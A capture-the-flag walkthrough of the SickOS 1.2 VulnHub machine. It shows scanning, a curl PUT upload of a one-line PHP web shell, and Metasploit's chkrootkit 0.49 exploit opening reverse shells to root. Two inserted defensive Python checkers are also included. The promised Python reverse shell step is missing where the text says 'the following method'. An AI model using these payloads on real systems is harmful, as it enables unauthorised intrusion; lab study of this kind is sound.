“This is second in following series from SickOs and is independent of the prior releases, scope of challenge is to gain highest privileges on the system.” – D4rk
For more information and the OVA file download, see the VulnHub entry for this VM.
Attacker & Target
Attacker: Kali2 Linux (10.1.1.132/24)
Target: SickOS: 1.2 (10.1.1.133/24)
Vulnerability & Exploit
File upload via HTTP PUT method
Python reverse shell
chkrootkit 0.49 Local Root Exploit
Method
Scanned the network to discover the target server [arp-scan]
Port scanned the target to discover open ports and running services [masscan && nmap]
Used dirb to discover hidden directories [dirb]
Scanned the web application to dig up more information about the web service [nikto]
Exploited the HTTP PUT method to upload a one-line PHP shell
Used a Python reverse shell to get a better shell
Enumerated the host and exploited chkrootkit 0.49 to get root
Tools
All the tools used here ship with Kali Linux.
As a routine first step, run arp-scan to find the target's IP address (10.1.1.133 in this case).
root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.1 00:50:56:c0:00:08 VMware, Inc.
10.1.1.2 00:50:56:f1:61:7e VMware, Inc.
10.1.1.133 00:0c:29:0f:eb:df VMware, Inc.
10.1.1.254 00:50:56:f0:91:47 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.290 seconds (111.79 hosts/sec). 4 responded
10.1.1.133 is our Target!
Then run masscan to find open ports on the target (masscan is much faster than nmap for a full port scan, so I use it for the full sweep and then let nmap do a deeper scan of the ports it finds).
root@kali:~# masscan -p1-65535 10.1.1.133/32 --rate=10000
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2016-06-05 04:39:01 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 22/tcp on 10.1.1.133
Discovered open port 80/tcp on 10.1.1.133
masscan found two open ports (22 and 80), so I then ran nmap for a deeper service scan.
# Nmap 7.12 scan initiated Sun Jun 5 14:40:00 2016 as: nmap -sV -A -O -v -oN 133_nmap.txt 10.1.1.133
Nmap scan report for 10.1.1.133
Host is up (0.00034s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
| 2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_ 256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open http lighttpd 1.4.28
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:0F:EB:DF (VMware)
... truncated ...
Run nikto against the web application; nothing useful turned up beyond a few missing security headers and the x-powered-by header.
- Nikto v2.1.6/2.1.5
+ Target Host: 10.1.1.133
+ Target Port: 80
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ GET Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
Then run dirb to discover hidden directories; one folder was found: /test/.
root@kali:~/myExercises/sickos1.2# dirb http://10.1.1.133/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Jun 5 14:46:31 2016
URL_BASE: http://10.1.1.133/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.1.1.133/ ----
+ http://10.1.1.133/index.php (CODE:200|SIZE:163)
==> DIRECTORY: http://10.1.1.133/test/
---- Entering directory: http://10.1.1.133/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sun Jun 5 14:46:34 2016
DOWNLOADED: 4612 - FOUND: 1
Then enumerate the HTTP methods with curl. Nothing interesting is allowed on /, but many methods are available on /test/, including PUT.
Now upload a one-line PHP shell with the PUT method.
root@kali:~/myExercises/sickos1.2# curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://10.1.1.133/test/shell.php
* Trying 10.1.1.133...
* Connected to 10.1.1.133 (10.1.1.133) port 80 (#0)
> PUT /test/shell.php HTTP/1.1
> Host: 10.1.1.133
> User-Agent: curl/7.47.0
> Accept: */*
> Content-Length: 30
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 30 out of 30 bytes
< HTTP/1.1 200 OK
< Content-Length: 0
< Date: Sun, 05 Jun 2016 05:04:11 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 10.1.1.133 left intact
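The curl OPTIONS check above is the kind of thing worth scripting for your own web roots. This added example (not from the original write-up) parses an Allow header and flags any directory that advertises write-capable methods such as PUT; the header values in the comments and the 127.0.0.1 URLs are constructed placeholders.

```python
# Added example: flag web paths that advertise write methods over HTTP.
import http.client
import re
from urllib.parse import urlsplit

# Methods that let an anonymous client create, replace or delete server-side
# files. A directory advertising any of these is a file-upload hole like /test/.
WRITE_METHODS = {"PUT", "DELETE", "PATCH", "MKCOL", "MOVE", "COPY",
                 "PROPPATCH", "LOCK", "UNLOCK"}


def parse_allow(header_value):
    """Split an Allow header into upper-case method names.

    Accepts both the RFC form 'GET, HEAD, POST' and the space-separated form
    nmap's http-methods script prints ('GET HEAD POST OPTIONS')."""
    return {m.upper() for m in re.split(r"[,\s]+", header_value or "") if m}


def classify(allowed):
    """Return the write-capable methods present; an empty set means read-only."""
    return allowed & WRITE_METHODS


def probe(url, timeout=5):
    """Send an OPTIONS request and return (status, Allow header value)."""
    parts = urlsplit(url)
    conn = http.client.HTTPConnection(parts.hostname, parts.port or 80, timeout=timeout)
    try:
        conn.request("OPTIONS", parts.path or "/")
        resp = conn.getresponse()
        return resp.status, resp.getheader("Allow", "")
    finally:
        conn.close()


def audit(url):
    """Probe one URL and return (status, verdict, sorted risky methods)."""
    status, allow = probe(url)
    risky = classify(parse_allow(allow))
    return status, ("WRITABLE" if risky else "read-only"), sorted(risky)


if __name__ == "__main__":
    import sys
    # Placeholder URLs; pass your own paths on the command line.
    for target in sys.argv[1:] or ["http://127.0.0.1/", "http://127.0.0.1/test/"]:
        try:
            print(target, *audit(target))
        except OSError as exc:
            print(target, "error:", exc)
```

On lighttpd the matching fix is to keep mod_webdav off for anonymous paths or set `webdav.is-readonly = "enable"` so PUT and DELETE are refused.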
Now set up nc to listen on port 443 (I tried port 4444 first, but it was blocked). I then tried to upload a reverse shell via wget, which failed for some reason, and finally got the following method to work:
msf exploit(handler) > use exploit/unix/local/chkrootkit
msf exploit(chkrootkit) > show options
Module options (exploit/unix/local/chkrootkit):
Name Current Setting Required Description
---- --------------- -------- -----------
CHKROOTKIT /usr/sbin/chkrootkit yes Path to chkrootkit
SESSION 1 yes The session to run this module on.
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(chkrootkit) > set lport 8080
lport=> 8080
msf exploit(chkrootkit) > run -j
[*] Exploit running as background job.
[*] Started reverse TCP double handler on 10.1.1.132:8080
[!] Rooting depends on the crontab (this could take a while)
msf exploit(chkrootkit) > [*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo cywywDOR3lw9KtfF;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "cywywDOR3lw9KtfF\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (10.1.1.132:8080 -> 10.1.1.133:47139) at 2016-06-05 15:47:03 +1000
[+] Deleted /tmp/update
msf exploit(chkrootkit) > sessions -l
Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell linux /bin/sh: 0: can't access tty; job control turned off $ 10.1.1.132:443 -> 10.1.1.133:33545 (10.1.1.133)
2 shell unix 10.1.1.132:8080 -> 10.1.1.133:47139 (10.1.1.133)
msf exploit(chkrootkit) > sessions -i 2
[*] Starting interaction with 2...
587635846
xjfpouiBcdHXtWSGDLawUifFliLoRHgO
trueglQiWVKYGXJIbMNxCzFdLkHTvwzJXMsL
XhEJPxQGJEXCqeHWEuuyRuhgtzDjhhsG
lblxnAmeZfPiTZxaWNHygwoaqIzqbUNo
id
uid=0(root) gid=0(root) groups=0(root)
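The module above only works because chkrootkit 0.49 and earlier execute /tmp/update as root when their slapper() check finds it, and because cron runs chkrootkit unattended. This added example (not from the original write-up or the Metasploit module) is a local defender check for that combination; it assumes chkrootkit prints its version with -V, and the crontab strings in the test are constructed.

```python
# Added example: spot the conditions the chkrootkit 0.49 local root relies on.
import glob
import os
import re
import subprocess

VULNERABLE_MAX = (0, 49)        # last chkrootkit release with the slapper() bug
TRIGGER_PATH = "/tmp/update"    # file that slapper() ends up executing as root


def parse_version(text):
    """Pull (major, minor) out of 'chkrootkit -V' output such as 'chkrootkit version 0.49'."""
    m = re.search(r"(\d+)\.(\d+)", text or "")
    return (int(m.group(1)), int(m.group(2))) if m else None


def assess(version_text, cron_texts, trigger_exists):
    """Pure decision logic so it can be tested without touching the host.

    Returns (level, reasons): OK, VULNERABLE (old version installed) or
    CRITICAL (old version and the trigger file is already sitting in /tmp)."""
    reasons = []
    ver = parse_version(version_text)
    old = ver is not None and ver <= VULNERABLE_MAX
    if old:
        reasons.append("chkrootkit %d.%d is <= 0.49" % ver)
    if any("chkrootkit" in t for t in cron_texts):
        reasons.append("chkrootkit is scheduled from cron, so it runs as root unattended")
    if trigger_exists:
        reasons.append("%s exists and would run on the next chkrootkit invocation" % TRIGGER_PATH)
    if old and trigger_exists:
        return "CRITICAL", reasons
    return ("VULNERABLE" if old else "OK"), reasons


def scan_host():
    """Collect the real inputs from this machine (assumes 'chkrootkit -V' prints the version)."""
    try:
        out = subprocess.run(["chkrootkit", "-V"], capture_output=True, text=True).stdout
    except OSError:
        out = ""                       # chkrootkit not installed: version check passes
    cron_texts = []
    cron_files = ["/etc/crontab"] + glob.glob("/etc/cron.d/*") + glob.glob("/var/spool/cron/crontabs/*")
    for path in cron_files:
        try:
            with open(path) as fh:
                cron_texts.append(fh.read())
        except OSError:
            pass                       # unreadable without root; skip it
    return assess(out, cron_texts, os.path.exists(TRIGGER_PATH))


if __name__ == "__main__":
    level, why = scan_host()
    print(level, *("\n - " + r for r in why))
```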
Then grab the FLAG file:
root@ubuntu:~# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.
Thanks for giving this try.
@vulnhub: Thanks for hosting this UP!.